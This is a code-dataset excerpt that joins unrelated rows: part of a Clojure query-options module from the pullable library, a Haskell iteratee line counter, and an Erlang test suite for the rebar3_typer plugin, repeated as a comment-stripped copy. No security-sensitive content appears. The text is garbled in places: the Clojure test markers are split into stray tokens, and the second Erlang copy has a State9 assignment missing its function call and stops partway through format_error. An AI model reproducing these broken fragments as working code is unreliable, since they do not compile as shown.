when everything ok, it returns the original data
=> [:a nil]
Takes any value as its argument (:proc/val)
When a value not found, it gets replaced by not-found value
=> [:a :default]
Takes a vector of args as this option's argument (:proc/val)
Requires value being a function, it applies the vector of args to it,
returns the return value as query result.
=>> [:a u/error?]
Takes a vector of vector of args as this options's argument.
query result will have a value of a vector of applying resturn value.
=>> [:a u/error?]
Takes a pair of numbers as this option's argument.
query result has a value of a sequence of truncated sequence.
throws=>> {:error/message #"illegal argument"}
=> [:a [1 2 3]]
=>> [:a u/error?]
Takes an function as the argument (:proc/val):
[:=> [:catn [:old-value :any] [:new-value :any]] :any]
returns `nil` when your do want to watch it anymore.
Can watch on a IRef value
=>> [:a u/error?]
=> [:a 0] | Copyright 2022 , Flybot Pte . Ltd.
Apache License 2.0 , /
(ns sg.flybot.pullable.core.option
"support for decorate query options"
(:require [sg.flybot.pullable.util :as u :refer [data-error]]))
(defmulti apply-post
"create a post processor by ::pp-type, returns a function takes
k-v pair, returns the same shape of data"
:proc/type)
(defn assert-arg!
"An error that represent apply-post illegal argument."
[pred arg]
(when-not (pred (:proc/val arg))
(throw (ex-info "illegal argument" arg))))
(defmethod apply-post :default
[arg]
(assert-arg! (constantly false) arg))
^:rct/test
(comment
throws= > > { : error / class clojure.lang . ExceptionInfo }
)
# # # : when option
(defmethod apply-post :when
[arg]
(let [{pred :proc/val} arg]
(assert-arg! fn? arg)
(fn [[k v]]
[k (when (pred v) v)])))
^:rct/test
(comment
throws= > > { : error / class clojure.lang . ExceptionInfo }
= > [: a 1 ]
)
# # # : not - found option
(defmethod apply-post :not-found
[{:proc/keys [val]}]
(fn [[k v]]
[k (or v val)]))
^:rct/test
(comment
= > [: a 1 ]
)
# # # : with option
(defmethod apply-post :with
[arg]
(let [{args :proc/val} arg]
(assert-arg! vector? arg)
(fn [[k f]]
[k (if (fn? f)
(apply f args)
(data-error f k "value must be a function"))])))
^:rct/test
(comment
throws= > > { : error / class clojure.lang . ExceptionInfo }
= > [: a 4 ]
)
# # # : batch option
only for function value .
(defmethod apply-post :batch
[arg]
(assert-arg! #(and (vector? %) (every? vector? %)) arg)
(let [{args-vec :proc/val} arg]
(fn [[k f]]
[k (if-not (fn? f)
(data-error f k "value must be a function")
(map #(apply f %) args-vec))])))
^:rct/test
(comment
throws= > > { : error / class clojure.lang . ExceptionInfo }
= > [: a [ 4 5 ] ]
)
# # # : seq option ( Pagination )
from : number ] [: count : number ] ]
Appliable only for seq query .
(defmethod apply-post :seq
[arg]
(assert-arg! vector? arg)
(let [[from cnt] (:proc/val arg)
from (or from 0)
cnt (or cnt 0)]
(fn [[k v]]
[k (if-not (seqable? v)
(data-error v k "seq option can only be used on sequences")
(->> v (drop from) (take cnt)))])))
^:rct/test
(comment
)
# # # : watch option
(def watchable?
"pred if `x` is watchable"
(fn [x]
#?(:clj (instance? clojure.lang.IRef x)
:cljs (satisfies? IDeref x))))
(defmethod apply-post :watch
[arg]
(assert-arg! fn? arg)
(let [f (:proc/val arg)
w-k ::watch
watcher (fn [_ watched old-value new-value]
(when (nil? (f old-value new-value))
(remove-watch watched w-k)))]
(fn [[k v]]
(if (watchable? v)
(do (add-watch v w-k watcher)
[k @v])
[k (data-error v k "watch option can only apply to an watchable value")]))))
^:rct/test
(comment
throws= > > { : error / class clojure.lang . ExceptionInfo }
(def a (atom 0))
(def b (atom 0))
(reset! a 5)
= > 5
) |
33f011881564945a56b833fdfc68b06bade56429a2574f08d79703b161a3b837 | JohnLato/iteratee | test_wc.hs | import qualified Data.ByteString.Char8 as C
import qualified Data.Iteratee as I
import System
cnt :: I.Iteratee C.ByteString IO Int
cnt = I.liftI (step 0)
where
step acc (I.Chunk s)
| C.null s = I.icont (step acc) Nothing
| True = let acc' = acc + C.count '\n' s in acc' `seq` I.icont (step acc') Nothing
step acc str = I.idone acc str
main = do
[f] <- getArgs
I.fileDriverVBuf (2^16) cnt f >>= print
| null | https://raw.githubusercontent.com/JohnLato/iteratee/83852cebab1051999d70d2abce86f5ab88c6d7ec/Examples/test_wc.hs | haskell | import qualified Data.ByteString.Char8 as C
import qualified Data.Iteratee as I
import System
cnt :: I.Iteratee C.ByteString IO Int
cnt = I.liftI (step 0)
where
step acc (I.Chunk s)
| C.null s = I.icont (step acc) Nothing
| True = let acc' = acc + C.count '\n' s in acc' `seq` I.icont (step acc') Nothing
step acc str = I.idone acc str
main = do
[f] <- getArgs
I.fileDriverVBuf (2^16) cnt f >>= print
| |
4cf3978162d2872173576ba592a0b6c0da34b7ca0d8841922f9fb0d54bbde96b | AdRoll/rebar3_typer | rebar3_typer_prv_SUITE.erl | %%% @doc Test module for rebar3_typer_prv
-module(rebar3_typer_prv_SUITE).
-behaviour(ct_suite).
-export([all/0, init_per_testcase/2, end_per_testcase/2]).
-export([no_options/1, recursive/1, includes/1, files/1, good_modes/1, colliding_modes/1,
show_success_typings/1, no_spec/1, edoc/1, plt/1, typespec_files/1, unrecognized_opt/1,
format_error/1]).
all() ->
[no_options,
recursive,
includes,
files,
good_modes,
colliding_modes,
show_success_typings,
no_spec,
edoc,
plt,
typespec_files,
unrecognized_opt,
format_error].
init_per_testcase(_, Config) ->
Self = self(),
meck:new(typer_core),
meck:expect(typer_core,
run,
fun(Opts) ->
Self ! #{opts => Opts},
ok
end),
Config.
end_per_testcase(_, Config) ->
meck:unload(typer_core),
Config.
%% @doc Just try to run typer without options
no_options(_Config) ->
{ok, State} =
rebar3_typer:init(
rebar_state:new()),
ct:comment("Simply running typer without any parameter should use only default values"),
RebarIo =
#{abort => fun rebar_api:abort/2,
debug => fun rebar_api:debug/2,
info => fun rebar_api:info/2,
warn => fun rebar_api:warn/2},
[{files_r, []}, {io, RebarIo}, {mode, show}, {plt, _}] = get_opts(State),
{comment, ""}.
%% @doc --recursive / recursive
recursive(_Config) ->
{ok, State} =
rebar3_typer:init(
rebar_state:new()),
ct:comment("files_r is correctly picked up from rebar.config"),
Files = ["src/", "test/"],
State1 = rebar_state:set(State, typer, [{recursive, Files}]),
{files_r, Files} = lists:keyfind(files_r, 1, get_opts(State1)),
ct:comment("--recursive takes precedence"),
State2 = rebar_state:command_parsed_args(State1, {[{recursive, "lib/,src/"}], []}),
{files_r, ["lib/", "src/"]} = lists:keyfind(files_r, 1, get_opts(State2)),
ct:comment("finds dirs from sub_dirs in rebar.config"),
State3 = rebar_state:set(State, sub_dirs, ["foo"]),
{files_r, ["foo"]} = lists:keyfind(files_r, 1, get_opts(State3)),
ct:comment("finds dirs from extra_src_dirs in rebar.config"),
State4 = rebar_state:set(State, extra_src_dirs, ["bar"]),
{files_r, ["bar"]} = lists:keyfind(files_r, 1, get_opts(State4)),
ct:comment("finds dirs from src_dirs in rebar.config"),
State5 = rebar_state:set(State, src_dirs, ["baz"]),
{files_r, ["baz"]} = lists:keyfind(files_r, 1, get_opts(State5)),
ct:comment("assumes reasonable defaults for regular apps"),
{files_r, ["src"]} = lists:keyfind(files_r, 1, get_opts_from("dummy")),
ct:comment("assumes reasonable defaults for umbrella apps"),
{files_r, ["apps/app1/src", "apps/app2/src"]} =
lists:keyfind(files_r, 1, get_opts_from("umbrella")),
ct:comment("assumes reasonable defaults as a last ditch"),
{files_r, ["lib/app1/src", "lib/app2/src"]} =
lists:keyfind(files_r, 1, get_opts_from("last-ditch")),
{comment, ""}.
%% @doc Proper include folder discovery
%% @todo Add tests for includes in rebar
includes(_Config) ->
    %% Each path is reversed so the `"…/" ++ _` patterns can match on its
    %% suffix (the part relative to the fixture folder), ignoring the prefix.
    ReversedSorted = fun(Paths) -> [lists:reverse(P) || P <- lists:sort(Paths)] end,
    ct:comment("Regular include folder and erl_opts are correctly picked up"),
    {includes, DummyPaths} = lists:keyfind(includes, 1, get_opts_from("dummy")),
    ["ymmud/selif/" ++ _,
     "edulcni/ymmud/selif/" ++ _,
     "edulcni_rehto/ymmud/selif/" ++ _,
     "crs/ymmud/selif/" ++ _] =
        ReversedSorted(DummyPaths),
    ct:comment("Includes in subdirs are correctly picked up"),
    {includes, SubPaths} = lists:keyfind(includes, 1, get_opts_from("subs")),
    ["sbus/selif/" ++ _,
     "edulcni/sbus/selif/" ++ _,
     "crs/sbus/selif/" ++ _,
     "edulcni/crs/sbus/selif/" ++ _] =
        ReversedSorted(SubPaths),
    ct:comment("Includes in umbrella projects are correctly picked up"),
    {includes, UmbrellaPaths} = lists:keyfind(includes, 1, get_opts_from("umbrella")),
    ["1ppa/sppa/allerbmu/selif/" ++ _,
     "edulcni/1ppa/sppa/allerbmu/selif/" ++ _,
     "crs/1ppa/sppa/allerbmu/selif/" ++ _,
     "2ppa/sppa/allerbmu/selif/" ++ _,
     "edulcni/2ppa/sppa/allerbmu/selif/" ++ _,
     "crs/2ppa/sppa/allerbmu/selif/" ++ _] =
        ReversedSorted(UmbrellaPaths),
    {comment, ""}.
%% @doc --files / files
files(_Config) ->
    {ok, St0} = rebar3_typer:init(rebar_state:new()),
    ct:comment("files is correctly picked up from rebar.config"),
    FileList = ["files/dummy/src/dummy.erl"],
    St1 = rebar_state:set(St0, typer, [{files, FileList}]),
    {files, FileList} = lists:keyfind(files, 1, get_opts(St1)),
    ct:comment("files prevents default files_r"),
    %% keyfind/3 returns false when the key is absent.
    false = lists:keyfind(files_r, 1, get_opts(St1)),
    ct:comment("--files takes precedence over rebar.config"),
    St2 = rebar_state:command_parsed_args(St1,
                                          {[{files, "files/single_file/single.erl"}], []}),
    {files, ["files/single_file/single.erl"]} = lists:keyfind(files, 1, get_opts(St2)),
    ct:comment("--files prevents default files_r"),
    false = lists:keyfind(files_r, 1, get_opts(St2)),
    {comment, ""}.
%% @doc --show|show_exported|annotate|annotate_inc_files / mode
good_modes(_Config) ->
    {ok, St0} = rebar3_typer:init(rebar_state:new()),
    ct:comment("mode is correctly picked up from rebar.config"),
    St1 = rebar_state:set(St0, typer, [{mode, annotate}]),
    {mode, annotate} = lists:keyfind(mode, 1, get_opts(St1)),
    St2 = rebar_state:set(St1, typer, [{mode, show_exported}]),
    {mode, show_exported} = lists:keyfind(mode, 1, get_opts(St2)),
    ct:comment("--show takes precedence"),
    St3 = rebar_state:command_parsed_args(St2, {[{show, true}], []}),
    {mode, show} = lists:keyfind(mode, 1, get_opts(St3)),
    ct:comment("--show=false uses what's in rebar.config"),
    St4 = rebar_state:command_parsed_args(St2, {[{show, false}], []}),
    {mode, show_exported} = lists:keyfind(mode, 1, get_opts(St4)),
    ct:comment("--annotate works"),
    St5 = rebar_state:command_parsed_args(St2, {[{annotate, true}], []}),
    {mode, annotate} = lists:keyfind(mode, 1, get_opts(St5)),
    ct:comment("--show_exported works"),
    St6 = rebar_state:command_parsed_args(St2, {[{show_exported, true}], []}),
    {mode, show_exported} = lists:keyfind(mode, 1, get_opts(St6)),
    ct:comment("--annotate-inc-files works"),
    St7 = rebar_state:command_parsed_args(St2, {[{annotate_inc_files, true}], []}),
    {mode, annotate_inc_files} = lists:keyfind(mode, 1, get_opts(St7)),
    ct:comment("--annotate-in-place works"),
    St8 = rebar_state:command_parsed_args(St2, {[{annotate_in_place, true}], []}),
    {mode, annotate_in_place} = lists:keyfind(mode, 1, get_opts(St8)),
    ct:comment("on and off works"),
    %% Built on St0: no typer config in rebar.config, so toggling a flag on
    %% and back off again falls through to the default mode.
    St9 = rebar_state:command_parsed_args(St0,
                                          {[{show_exported, true}, {show_exported, false}], []}),
    {mode, show} = lists:keyfind(mode, 1, get_opts(St9)),
    ct:comment("many false ones"),
    St10 =
        rebar_state:command_parsed_args(St2,
                                        {[{annotate, true},
                                          {annotate_inc_files, false},
                                          {show, false}],
                                         []}),
    {mode, annotate} = lists:keyfind(mode, 1, get_opts(St10)),
    ct:comment("super true"),
    %% Repeating the same mode flag is not a collision.
    St11 =
        rebar_state:command_parsed_args(St2,
                                        {[{annotate, true}, {annotate, true}, {annotate, true}],
                                         []}),
    {mode, annotate} = lists:keyfind(mode, 1, get_opts(St11)),
    {comment, ""}.
%% @doc --show|show_exported|annotate|annotate_inc_files / mode
colliding_modes(_Config) ->
    {ok, St0} = rebar3_typer:init(rebar_state:new()),
    ct:comment("2 modes can't be set simultaneously"),
    St1 = rebar_state:command_parsed_args(St0, {[{show, true}, {show_exported, true}], []}),
    %% The error carries {NewMode, PreviouslySetMode}.
    {colliding_modes, show_exported, show} = get_error(St1),
    ct:comment("3 modes can't be set simultaneously"),
    St2 =
        rebar_state:command_parsed_args(St1,
                                        {[{show_exported, true},
                                          {annotate, true},
                                          {annotate_inc_files, true}],
                                         []}),
    {colliding_modes, annotate, show_exported} = get_error(St2),
    {comment, ""}.
%% @doc --show_success_typings / show_success_typings
show_success_typings(_Config) ->
    {ok, St0} = rebar3_typer:init(rebar_state:new()),
    ct:comment("show_succ is correctly picked up from rebar.config"),
    %% The rebar.config key is show_success_typings; typer_core calls it show_succ.
    St1 = rebar_state:set(St0, typer, [{show_success_typings, true}]),
    {show_succ, true} = lists:keyfind(show_succ, 1, get_opts(St1)),
    ct:comment("--show_success_typings takes precedence"),
    St2 = rebar_state:command_parsed_args(St1, {[{show_success_typings, false}], []}),
    {show_succ, false} = lists:keyfind(show_succ, 1, get_opts(St2)),
    {comment, ""}.
%% @doc --no_spec / no_spec
no_spec(_Config) ->
    {ok, St0} = rebar3_typer:init(rebar_state:new()),
    ct:comment("no_spec is correctly picked up from rebar.config"),
    St1 = rebar_state:set(St0, typer, [{no_spec, true}]),
    {no_spec, true} = lists:keyfind(no_spec, 1, get_opts(St1)),
    ct:comment("--no_spec takes precedence"),
    St2 = rebar_state:command_parsed_args(St1, {[{no_spec, false}], []}),
    {no_spec, false} = lists:keyfind(no_spec, 1, get_opts(St2)),
    {comment, ""}.
%% @doc --edoc / edoc
edoc(_Config) ->
    {ok, St0} = rebar3_typer:init(rebar_state:new()),
    ct:comment("edoc is correctly picked up from rebar.config"),
    St1 = rebar_state:set(St0, typer, [{edoc, true}]),
    {edoc, true} = lists:keyfind(edoc, 1, get_opts(St1)),
    ct:comment("--edoc takes precedence"),
    St2 = rebar_state:command_parsed_args(St1, {[{edoc, false}], []}),
    {edoc, false} = lists:keyfind(edoc, 1, get_opts(St2)),
    {comment, ""}.
%% @doc --plt / plt
plt(_Config) ->
    {ok, St0} = rebar3_typer:init(rebar_state:new()),
    ct:comment("default plt is used if unconfigured"),
    DefaultPlt = "_build/default/rebar3_" ++ rebar_utils:otp_release() ++ "_plt",
    {plt, DefaultPlt} = lists:keyfind(plt, 1, get_opts(St0)),
    ct:comment("plt is correctly picked up from rebar.config"),
    St1 = rebar_state:set(St0, typer, [{plt, "1.plt"}]),
    {plt, "1.plt"} = lists:keyfind(plt, 1, get_opts(St1)),
    ct:comment("--plt takes precedence"),
    St2 = rebar_state:command_parsed_args(St1, {[{plt, "2.plt"}], []}),
    {plt, "2.plt"} = lists:keyfind(plt, 1, get_opts(St2)),
    ct:comment("plt from Dialyzer config is used"),
    St3 = rebar_state:set(St0, dialyzer, [{plt_location, "dialyzer"}, {plt_prefix, "app"}]),
    DialyzerPlt = "dialyzer/app_" ++ rebar_utils:otp_release() ++ "_plt",
    {plt, DialyzerPlt} = lists:keyfind(plt, 1, get_opts(St3)),
    ct:comment("plt from Dialyzer config is used with local keyword"),
    %% plt_location = local means "use the default build directory".
    St4 = rebar_state:set(St0, dialyzer, [{plt_location, local}, {plt_prefix, "app"}]),
    LocalPlt = "_build/default/app_" ++ rebar_utils:otp_release() ++ "_plt",
    {plt, LocalPlt} = lists:keyfind(plt, 1, get_opts(St4)),
    {comment, ""}.
%% @doc --typespec_files / typespec_files
typespec_files(_Config) ->
    {ok, St0} = rebar3_typer:init(rebar_state:new()),
    ct:comment("trusted is correctly picked up from rebar.config"),
    %% The rebar.config key is typespec_files; typer_core calls it trusted.
    TrustedFiles = ["f1.erl", "f2.erl"],
    St1 = rebar_state:set(St0, typer, [{typespec_files, TrustedFiles}]),
    {trusted, TrustedFiles} = lists:keyfind(trusted, 1, get_opts(St1)),
    ct:comment("--typespec_files takes precedence"),
    %% Command-line value is a comma-separated string that gets split.
    St2 = rebar_state:command_parsed_args(St1, {[{typespec_files, "f3.erl,f4.erl"}], []}),
    {trusted, ["f3.erl", "f4.erl"]} = lists:keyfind(trusted, 1, get_opts(St2)),
    {comment, ""}.
%% @doc unrecognized options
unrecognized_opt(_Config) ->
    {ok, St0} = rebar3_typer:init(rebar_state:new()),
    ct:comment("bad_opt in rebar.config"),
    %% Unknown typer options must be reported, not silently dropped.
    St1 = rebar_state:set(St0, typer, [{bad_opt, true}]),
    {unrecognized_opt, {bad_opt, true}} = get_error(St1),
    {comment, ""}.
%% @doc Error formatting
format_error(_Config) ->
    %% format_error/1 returns an iolist; flatten to a binary for comparison.
    Format = fun(Reason) -> iolist_to_binary(rebar3_typer_prv:format_error(Reason)) end,
    <<"Not yet implemented.">> = Format(not_implemented),
    <<"Unrecognized option in rebar.config: x">> = Format({unrecognized_opt, x}),
    <<"Mode was previously set to 'm1'; cannot set it to 'm2' now">> =
        Format({colliding_modes, m2, m1}),
    %% Anything else is just rendered as-is.
    <<"other">> = Format(other),
    {comment, ""}.
get_opts(State) ->
    %% Run the provider; the mocked typer_core:run/1 (see init_per_testcase)
    %% messages the options it was invoked with back to this process.
    {ok, _} = rebar3_typer_prv:do(State),
    receive
        #{opts := Opts} ->
            lists:sort(maps:to_list(Opts))
    after 500 ->
        {error, timeout}
    end.
get_error(State) ->
    %% The provider may report failures either as an {error, ...} return
    %% or by raising; normalize both to the bare error reason.
    try rebar3_typer_prv:do(State) of
        {error, {rebar3_typer_prv, Reason}} ->
            Reason;
        Other ->
            ct:fail("Unexpected: ~p", [Other])
    catch
        error:Raised ->
            Raised
    end.
get_opts_from(Folder) ->
    %% Run the provider from inside test/files/<Folder>, picking up that
    %% fixture's rebar.config, and always restore the original cwd.
    {ok, PreviousCwd} = file:get_cwd(),
    try
        FixtureDir = filename:join([code:lib_dir(rebar3_typer), "test", "files", Folder]),
        ok = file:set_cwd(FixtureDir),
        {ok, RebarConfig} = file:consult("rebar.config"),
        {ok, St0} = rebar_prv_app_discovery:init(rebar_state:new(RebarConfig)),
        {ok, St1} = rebar_prv_app_discovery:do(St0),
        {ok, St2} = rebar3_typer:init(St1),
        get_opts(St2)
    after
        file:set_cwd(PreviousCwd)
    end.
| null | https://raw.githubusercontent.com/AdRoll/rebar3_typer/a77f3311e3bc0c94836226c343ecbe215180f896/test/rebar3_typer_prv_SUITE.erl | erlang | @doc Test module for rebar3_typer_prv
@doc Just try to run typer without options
@doc --recursive / recursive
@doc Proper include folder discovery
@doc --files / files
@doc --show|show_exported|annotate|annotate_inc_files / mode
without changes in rebar.config
@doc --show|show_exported|annotate|annotate_inc_files / mode
@doc --show_success_typings / show_success_typings
@doc --no_spec / no_spec
@doc --edoc / edoc
@doc --typespec_files / typespec_files
@doc unrecognized options
@doc Error formatting | -module(rebar3_typer_prv_SUITE).
-behaviour(ct_suite).
-export([all/0, init_per_testcase/2, end_per_testcase/2]).
-export([no_options/1, recursive/1, includes/1, files/1, good_modes/1, colliding_modes/1,
show_success_typings/1, no_spec/1, edoc/1, plt/1, typespec_files/1, unrecognized_opt/1,
format_error/1]).
all() ->
[no_options,
recursive,
includes,
files,
good_modes,
colliding_modes,
show_success_typings,
no_spec,
edoc,
plt,
typespec_files,
unrecognized_opt,
format_error].
init_per_testcase(_, Config) ->
Self = self(),
meck:new(typer_core),
meck:expect(typer_core,
run,
fun(Opts) ->
Self ! #{opts => Opts},
ok
end),
Config.
end_per_testcase(_, Config) ->
meck:unload(typer_core),
Config.
no_options(_Config) ->
{ok, State} =
rebar3_typer:init(
rebar_state:new()),
ct:comment("Simply running typer without any parameter should use only default values"),
RebarIo =
#{abort => fun rebar_api:abort/2,
debug => fun rebar_api:debug/2,
info => fun rebar_api:info/2,
warn => fun rebar_api:warn/2},
[{files_r, []}, {io, RebarIo}, {mode, show}, {plt, _}] = get_opts(State),
{comment, ""}.
recursive(_Config) ->
{ok, State} =
rebar3_typer:init(
rebar_state:new()),
ct:comment("files_r is correctly picked up from rebar.config"),
Files = ["src/", "test/"],
State1 = rebar_state:set(State, typer, [{recursive, Files}]),
{files_r, Files} = lists:keyfind(files_r, 1, get_opts(State1)),
ct:comment("--recursive takes precedence"),
State2 = rebar_state:command_parsed_args(State1, {[{recursive, "lib/,src/"}], []}),
{files_r, ["lib/", "src/"]} = lists:keyfind(files_r, 1, get_opts(State2)),
ct:comment("finds dirs from sub_dirs in rebar.config"),
State3 = rebar_state:set(State, sub_dirs, ["foo"]),
{files_r, ["foo"]} = lists:keyfind(files_r, 1, get_opts(State3)),
ct:comment("finds dirs from extra_src_dirs in rebar.config"),
State4 = rebar_state:set(State, extra_src_dirs, ["bar"]),
{files_r, ["bar"]} = lists:keyfind(files_r, 1, get_opts(State4)),
ct:comment("finds dirs from src_dirs in rebar.config"),
State5 = rebar_state:set(State, src_dirs, ["baz"]),
{files_r, ["baz"]} = lists:keyfind(files_r, 1, get_opts(State5)),
ct:comment("assumes reasonable defaults for regular apps"),
{files_r, ["src"]} = lists:keyfind(files_r, 1, get_opts_from("dummy")),
ct:comment("assumes reasonable defaults for umbrella apps"),
{files_r, ["apps/app1/src", "apps/app2/src"]} =
lists:keyfind(files_r, 1, get_opts_from("umbrella")),
ct:comment("assumes reasonable defaults as a last ditch"),
{files_r, ["lib/app1/src", "lib/app2/src"]} =
lists:keyfind(files_r, 1, get_opts_from("last-ditch")),
{comment, ""}.
@todo Add tests for includes in rebar
includes(_Config) ->
ct:comment("Regular include folder and erl_opts are correctly picked up"),
{includes, Paths} = lists:keyfind(includes, 1, get_opts_from("dummy")),
["ymmud/selif/" ++ _,
"edulcni/ymmud/selif/" ++ _,
"edulcni_rehto/ymmud/selif/" ++ _,
"crs/ymmud/selif/" ++ _] =
[lists:reverse(Path) || Path <- lists:sort(Paths)],
ct:comment("Includes in subdirs are correctly picked up"),
{includes, SubPaths} = lists:keyfind(includes, 1, get_opts_from("subs")),
["sbus/selif/" ++ _,
"edulcni/sbus/selif/" ++ _,
"crs/sbus/selif/" ++ _,
"edulcni/crs/sbus/selif/" ++ _] =
[lists:reverse(Path) || Path <- lists:sort(SubPaths)],
ct:comment("Includes in umbrella projects are correctly picked up"),
{includes, UmbPaths} = lists:keyfind(includes, 1, get_opts_from("umbrella")),
["1ppa/sppa/allerbmu/selif/" ++ _,
"edulcni/1ppa/sppa/allerbmu/selif/" ++ _,
"crs/1ppa/sppa/allerbmu/selif/" ++ _,
"2ppa/sppa/allerbmu/selif/" ++ _,
"edulcni/2ppa/sppa/allerbmu/selif/" ++ _,
"crs/2ppa/sppa/allerbmu/selif/" ++ _] =
[lists:reverse(Path) || Path <- lists:sort(UmbPaths)],
{comment, ""}.
files(_Config) ->
{ok, State} =
rebar3_typer:init(
rebar_state:new()),
ct:comment("files is correctly picked up from rebar.config"),
Files = ["files/dummy/src/dummy.erl"],
State1 = rebar_state:set(State, typer, [{files, Files}]),
{files, Files} = lists:keyfind(files, 1, get_opts(State1)),
ct:comment("files prevents default files_r"),
false = lists:keyfind(files_r, 1, get_opts(State1)),
ct:comment("--files takes precedence over rebar.config"),
State2 =
rebar_state:command_parsed_args(State1, {[{files, "files/single_file/single.erl"}], []}),
{files, ["files/single_file/single.erl"]} = lists:keyfind(files, 1, get_opts(State2)),
ct:comment("--files prevents default files_r"),
false = lists:keyfind(files_r, 1, get_opts(State2)),
{comment, ""}.
good_modes(_Config) ->
{ok, State} =
rebar3_typer:init(
rebar_state:new()),
ct:comment("mode is correctly picked up from rebar.config"),
State1 = rebar_state:set(State, typer, [{mode, annotate}]),
{mode, annotate} = lists:keyfind(mode, 1, get_opts(State1)),
State2 = rebar_state:set(State1, typer, [{mode, show_exported}]),
{mode, show_exported} = lists:keyfind(mode, 1, get_opts(State2)),
ct:comment("--show takes precedence"),
State3 = rebar_state:command_parsed_args(State2, {[{show, true}], []}),
{mode, show} = lists:keyfind(mode, 1, get_opts(State3)),
ct:comment("--show=false uses what's in rebar.config"),
State4 = rebar_state:command_parsed_args(State2, {[{show, false}], []}),
{mode, show_exported} = lists:keyfind(mode, 1, get_opts(State4)),
ct:comment("--annotate works"),
State5 = rebar_state:command_parsed_args(State2, {[{annotate, true}], []}),
{mode, annotate} = lists:keyfind(mode, 1, get_opts(State5)),
ct:comment("--show_exported works"),
State6 = rebar_state:command_parsed_args(State2, {[{show_exported, true}], []}),
{mode, show_exported} = lists:keyfind(mode, 1, get_opts(State6)),
ct:comment("--annotate-inc-files works"),
State7 = rebar_state:command_parsed_args(State2, {[{annotate_inc_files, true}], []}),
{mode, annotate_inc_files} = lists:keyfind(mode, 1, get_opts(State7)),
ct:comment("--annotate-in-place works"),
State8 = rebar_state:command_parsed_args(State2, {[{annotate_in_place, true}], []}),
{mode, annotate_in_place} = lists:keyfind(mode, 1, get_opts(State8)),
ct:comment("on and off works"),
State9 =
{[{show_exported, true}, {show_exported, false}], []}),
{mode, show} = lists:keyfind(mode, 1, get_opts(State9)),
ct:comment("many false ones"),
State10 =
rebar_state:command_parsed_args(State2,
{[{annotate, true},
{annotate_inc_files, false},
{show, false}],
[]}),
{mode, annotate} = lists:keyfind(mode, 1, get_opts(State10)),
ct:comment("super true"),
StateA =
rebar_state:command_parsed_args(State2,
{[{annotate, true}, {annotate, true}, {annotate, true}],
[]}),
{mode, annotate} = lists:keyfind(mode, 1, get_opts(StateA)),
{comment, ""}.
colliding_modes(_Config) ->
{ok, State} =
rebar3_typer:init(
rebar_state:new()),
ct:comment("2 modes can't be set simultaneously"),
State1 =
rebar_state:command_parsed_args(State, {[{show, true}, {show_exported, true}], []}),
{colliding_modes, show_exported, show} = get_error(State1),
ct:comment("3 modes can't be set simultaneously"),
State2 =
rebar_state:command_parsed_args(State1,
{[{show_exported, true},
{annotate, true},
{annotate_inc_files, true}],
[]}),
{colliding_modes, annotate, show_exported} = get_error(State2),
{comment, ""}.
show_success_typings(_Config) ->
{ok, State} =
rebar3_typer:init(
rebar_state:new()),
ct:comment("show_succ is correctly picked up from rebar.config"),
State1 = rebar_state:set(State, typer, [{show_success_typings, true}]),
{show_succ, true} = lists:keyfind(show_succ, 1, get_opts(State1)),
ct:comment("--show_success_typings takes precedence"),
State2 = rebar_state:command_parsed_args(State1, {[{show_success_typings, false}], []}),
{show_succ, false} = lists:keyfind(show_succ, 1, get_opts(State2)),
{comment, ""}.
no_spec(_Config) ->
{ok, State} =
rebar3_typer:init(
rebar_state:new()),
ct:comment("no_spec is correctly picked up from rebar.config"),
State1 = rebar_state:set(State, typer, [{no_spec, true}]),
{no_spec, true} = lists:keyfind(no_spec, 1, get_opts(State1)),
ct:comment("--no_spec takes precedence"),
State2 = rebar_state:command_parsed_args(State1, {[{no_spec, false}], []}),
{no_spec, false} = lists:keyfind(no_spec, 1, get_opts(State2)),
{comment, ""}.
edoc(_Config) ->
{ok, State} =
rebar3_typer:init(
rebar_state:new()),
ct:comment("edoc is correctly picked up from rebar.config"),
State1 = rebar_state:set(State, typer, [{edoc, true}]),
{edoc, true} = lists:keyfind(edoc, 1, get_opts(State1)),
ct:comment("--edoc takes precedence"),
State2 = rebar_state:command_parsed_args(State1, {[{edoc, false}], []}),
{edoc, false} = lists:keyfind(edoc, 1, get_opts(State2)),
{comment, ""}.
@doc --plt / plt
plt(_Config) ->
{ok, State} =
rebar3_typer:init(
rebar_state:new()),
ct:comment("default plt is used if unconfigured"),
Expected = "_build/default/rebar3_" ++ rebar_utils:otp_release() ++ "_plt",
{plt, Expected} = lists:keyfind(plt, 1, get_opts(State)),
ct:comment("plt is correctly picked up from rebar.config"),
State1 = rebar_state:set(State, typer, [{plt, "1.plt"}]),
{plt, "1.plt"} = lists:keyfind(plt, 1, get_opts(State1)),
ct:comment("--plt takes precedence"),
State2 = rebar_state:command_parsed_args(State1, {[{plt, "2.plt"}], []}),
{plt, "2.plt"} = lists:keyfind(plt, 1, get_opts(State2)),
ct:comment("plt from Dialyzer config is used"),
State3 =
rebar_state:set(State, dialyzer, [{plt_location, "dialyzer"}, {plt_prefix, "app"}]),
Expected3 = "dialyzer/app_" ++ rebar_utils:otp_release() ++ "_plt",
{plt, Expected3} = lists:keyfind(plt, 1, get_opts(State3)),
ct:comment("plt from Dialyzer config is used with local keyword"),
State4 = rebar_state:set(State, dialyzer, [{plt_location, local}, {plt_prefix, "app"}]),
Expected4 = "_build/default/app_" ++ rebar_utils:otp_release() ++ "_plt",
{plt, Expected4} = lists:keyfind(plt, 1, get_opts(State4)),
{comment, ""}.
typespec_files(_Config) ->
{ok, State} =
rebar3_typer:init(
rebar_state:new()),
ct:comment("trusted is correctly picked up from rebar.config"),
Files = ["f1.erl", "f2.erl"],
State1 = rebar_state:set(State, typer, [{typespec_files, Files}]),
{trusted, Files} = lists:keyfind(trusted, 1, get_opts(State1)),
ct:comment("--typespec_files takes precedence"),
State2 =
rebar_state:command_parsed_args(State1, {[{typespec_files, "f3.erl,f4.erl"}], []}),
{trusted, ["f3.erl", "f4.erl"]} = lists:keyfind(trusted, 1, get_opts(State2)),
{comment, ""}.
unrecognized_opt(_Config) ->
{ok, State} =
rebar3_typer:init(
rebar_state:new()),
ct:comment("bad_opt in rebar.config"),
State1 = rebar_state:set(State, typer, [{bad_opt, true}]),
{unrecognized_opt, {bad_opt, true}} = get_error(State1),
{comment, ""}.
format_error(_Config) ->
<<"Not yet implemented.">> =
iolist_to_binary(rebar3_typer_prv:format_error(not_implemented)),
<<"Unrecognized option in rebar.config: x">> =
iolist_to_binary(rebar3_typer_prv:format_error({unrecognized_opt, x})),
<<"Mode was previously set to 'm1'; cannot set it to 'm2' now">> =
iolist_to_binary(rebar3_typer_prv:format_error({colliding_modes, m2, m1})),
